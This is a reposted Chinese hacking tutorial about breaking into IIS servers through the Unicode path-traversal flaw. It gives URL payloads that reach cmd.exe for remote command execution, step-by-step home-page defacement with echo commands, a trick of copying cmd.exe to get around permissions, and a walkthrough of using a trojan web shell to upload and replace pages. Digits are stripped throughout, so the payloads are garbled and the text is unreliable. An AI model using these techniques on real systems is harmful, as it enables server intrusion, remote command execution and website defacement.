配色: 字号:
IIS漏洞入侵
2016-09-05 | 阅:  转:  |  分享 
  
IIS漏洞入侵

IIS(InternetInformationServer)服务为Web服务器提供了强大的Internet和Intranet服务功能主要通过端口来完成操作因为作为Web服务器端口总要打开具有很大的威胁性长期以来攻击IIS服务是黑客惯用的手段笔者记得有段时间两大黑客组织对攻就频繁地用到了IIS漏洞入侵这种情况现在还依然存在多是由于企业管理者或网管对安全问题关注不够造成的

Unicode漏洞

针对IIS的攻击方式可以说是五花八门使用大量的数据请求使IIS超负荷而停止工作是初级黑客的必修课程不过鉴于篇幅限制针对IIS的攻击本文不做详细介绍而是说说入侵IISIIS有十多种常见漏洞但利用得最多的莫过于Unicode解析错误漏洞微软IIS/在Unicode字符解码的实现中存在一个安全漏洞用户可以远程通过IIS执行任意命令当IIS打开文件时如果该文件名包含Unicode字符它会对它进行解码如果用户提供一些特殊的编码将导致IIS错误地打开或者执行某些Web根目录以外的文件或程序我们此文就着重来讲讲如何利用这个漏洞入侵IIS

对于IIS/中文版当IIS在收到的URL请求的文件名中包含一个特殊的编码例如%c%hh或者%c%hh它会首先将其解码变成xcxhh然后尝试打开这个文件Windows系统认为xcxhh可能是Unicode编码因此它会首先将其解码如果x=%hhx的话采用的解码的格式与下面的类似

%c%hh(xcxc)x+xhh

%c%hh(xcxc)x+xhh

因此利用这种编码我们可以构造很多字符例如:

%c%c(xcxc)x+xc=xc=/

%c%f(xcxc)x+xf=xf=\

攻击者可以利用这个漏洞来绕过IIS的路径检查去执行或者打开任意的文件此漏洞从中文版IIS+SP开始还影响中文版WIN+IIS中文版WIN+IIS+SP

在NT中/编码为%c%c在英文版的WIN中为%c%af在中文版的WIN里是%c%c此外还有多种编码不逐一阐述大家可以查查资料本文均以WIN为例其他类型请自行替换

判断是否存在漏洞

用该漏洞的扫描器来进行扫描是一种常见的方法但我们知道扫描并不是一个真正的黑客攻击行为它只是一种寻找入口的方式IIS的Unicode漏洞扫描器有很多如RangeScan或者是unicodeScan都可以进行扫描以收集服务器信息还有些综合性的扫描软件除了能发现Unicode漏洞之外同时还能收集服务器的其它漏洞――XScan(下载地址)

当然也可以在IE浏览器中输入以下语句来进行判断%cwww.edu800.cn%c/winnt/system/cmdexe?/c+dir

学过DOS的应该可以看懂其实就是利用当中的非法请求使我们连到system下如果Inetpub目录不和Winnt在同一盘符或者目录级数有改动就可能会引起请求失败

如果存在漏洞那么在浏览区可看到如下类似信息

DirectoryofC:\inetpub\scripts

:〈DIR〉

:〈DIR〉

是不是有自己机器的感觉了正点!要的就是这种感觉!

cmdexe相当于DOS里的因此我们可以执行很多命令了!

注意在上面输入的判断语句中/c后面的+实际上是空格请记牢!dir是DOS中的查看文件和目录命令不懂DOS的朋友快去学习

看了上面的介绍不用说大家也知道我们可以利用此漏洞对服务器展开攻击了!

修改网站首页

.确定网站首页名称

一般网站默认首页文件为lindexaspl或defaultasp中的一个我们可以通过输入不同的首页名称来测试并确定要修改的网站首页在IE地址栏中输入以下三个网址







通过对上面三个网址的测试我们发现只有第三个网址可以正常打开说明这个网站的首页名称为好了那么我们就修改它吧!

.修改原理

最方便的方法是echo法echo是一个系统命令主要用于设置回应开关

echotestc:\autoexecbat就是把test加入autoexecbat里并删除原有内容

echotimedatec:\autoexecbat就是加入timedate但不删除原有内容

明白了吗?接下来我们就可以逍遥地修改了

.更改网站首页

在IE中输入以下地址

%c%c/winnt/system/cmdexe?/c+echo+HaHaThisismyhack+c:\inetpub\wwwroot\

IE浏览器返回来的结果可能为以下两种情况之一

)HTTP内部服务器错误

)Theparameterisincorrect

通过返回信息提示和对CMD的分析可能是命令语句中参数错误加入符号再试试

)%c%c/winnt/system/cmdexe?/c+echo+HaHaThisismyhack+c:\inetpub\wwwroot\

表示把HaHaThisismyhack加入到文件并删除原有内容

)%c%c/winnt/system/cmdexe?/c+echo+by+c:\inetpub\wwwroot\

表示把by加入到文件中但不删除原有内容

如果正常上面两条语句的回应应该都为CGI错误这表示语句执行成功了系统只是程序性地报个错误不用理会它

现在再来打开网站看看吧怎么样了是不是被你改掉了?在实际操作中由于目录权限等网管因素的存在可能这个方法也会失效这时我们就可以用copycmdexe为另一个exe文件的方式解决不过要记住路径别出错了例如

%c%c/winnt/system/cmdexe?/c+copy+cmdexe+c:\aexe

c:\inetpub\wwwroot\>%c%c/aexe?/c+www.zycaihui.comecho+hackedbycshu+c:\inetpub\wwwroot\

本文讲到的技术比较简单很适合初学者研究和学习也许你通过本文的实例方式已经能修改我们提供的服务器首页了但是在实际操作中服务器环境必然有变化而且障碍也许是你未曾研究或接触过的所以只有牢牢地掌握了基础知识才有进阶的资本大家可以根据文中提到的知识点查阅资料辅助学习

第一关难点攻略

上传文件始终报错

有的朋友通过上一期文章介绍的步骤利用我们提供的木马程序在访问页面并上传首页文件时被堵住了其实我们在第一关的文章里提到过这些细节问题可能有些读者忽略了

①进入木马配置页面后点击Stream按钮

②根据文章要求我们必须在PATH栏里将访问地址改为D:\www\\ct

③点击浏览按钮选择一个本地硬盘中的index文件(为自定义名称)

提示根据文章中的说明该木马程序并不支持文件名重名由于参与的读者众多文件早已有人上传所以不改文件名将会提示上传错误的

④现在最关键的地方来了在保存为栏里必须填写完整的文件路径例如D:\www\\ct\index如果文件名不写是会报错的这是绝大多数参与者易犯的错误

⑤现在你只要点上传按钮即可

不能替换首页

有的朋友反映index已经成功地上传了但是第一关的任务是要将改为首页虽然现在可以通过上传的文件名来访问已上传的网页但并没有将它改为呀显然只上传文件是不够的还差一步

细心的读者肯定注意到了Stream页面中在每一个已上传的文件后面都有DownEditSaveAs几个按钮你只有点击SaveAs然后将你上传的htm文件更名为就可以了虽然我们提到的木马程序不能覆盖文件但可以通过这个方式达到替换首页的目的

献花(0)
+1
(本文系换换爱66首藏)